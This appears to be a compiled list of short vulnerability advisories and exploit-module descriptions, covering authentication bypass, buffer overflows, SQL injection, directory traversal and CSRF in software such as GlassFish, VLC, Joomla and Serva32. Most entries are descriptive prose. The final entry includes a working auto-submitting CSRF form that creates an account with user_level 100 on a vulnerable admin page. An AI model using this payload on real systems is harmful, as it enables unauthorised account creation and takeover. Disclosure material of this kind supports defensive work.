The Administration Console of Oracle GlassFish Server, which is listening by default on port 4848/TCP, is prone to an authentication bypass vulnerability. This vulnerability can be exploited by remote attackers to access sensitive data on the server without being authenticated, by making TRACE requests against the Administration Console.
Chasys Media Player is vulnerable to a buffer overflow vulnerability when a specially crafted .m3u file is opened. This can be exploited to execute arbitrary code by corrupting the SEH chain and overwriting the return address with a pointer to the malicious code.
This module exploits a vulnerability in SPlayer v3.7 or prior. When SPlayer requests the URL of a media file (video or audio), it is possible to gain arbitrary remote code execution due to a buffer overflow caused by an exceeding length of data as the 'Content-Type' parameter.
Traidnt UP version 2.0 is vulnerable to SQL injection. An attacker can inject malicious SQL queries via the 'file' parameter in the 'view.php' script. This can be exploited to bypass authentication and gain access to the application and the underlying database.
A directory traversal vulnerability in Serva32 1.2.00 RC1 can be exploited to read files outside of the web root.
The vulnerability exists due to insufficient filtration of user-supplied data passed via the 'catid' and 'secid' parameters to the '/index.php' script. A remote attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL commands in application's database. This can be exploited to bypass certain security restrictions, disclose sensitive data, modify data, etc.
A SQL injection vulnerability exists in the Joomla com_versioning component. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to sensitive information from the database, modify data, execute administration operations on the database, and potentially compromise the system.
Directory traversal vulnerabilities has been found in ffileman 7.0 a web based file and directory manager written with Perl. The vulnerability can be exploited to access local files by entering special characters in variables used to create file paths. The attackers use “../” sequences to move up to root directory, thus permitting navigation through the file system. The issue discovered can only be exploited with an authenticated session and setting the variable "direkt" like below with a HTTP GET or POST request.
This module exploits an input validation error in libmod_plugin as included with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9 are affected. By creating a malicious S3M file, a remote attacker could execute arbitrary code. Although other products that bundle libmodplug may be vulnerable, this module was only tested against VLC. NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to permanently enable NX support on machines that support it. As such, this module is capable of bypassing DEP, but not ASLR.
The vulnerability exists due to failure in the "/admin/users_maint.php" script to properly verify the source of HTTP request. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. Attacker can use browser to exploit this vulnerability. The following PoC is available: <form action="http://[host]/admin/users_maint.php?ccsForm=users_maint" method="post" name="main" /> <input type="hidden" name="user_login" value="test"/> <input type="hidden" name="user_password" value="test"/> <input type="hidden" name="user_level" value="100"/> <input type="hidden" name="user_email" value="test@test.com"/> <input type="hidden" name="user_first_name" value="test"/> <input type="hidden" name="user_last_name" value="test"/> <input type="hidden" name="user_is_approved" value="1"/> <input type="hidden" name="user_date_add_h" value="04.16.2011"/> <input type="submit" id="btn" name="submit" value="Submit ››"> </form> <script> document.getElementById('btn').click(); </script>
Services By CQR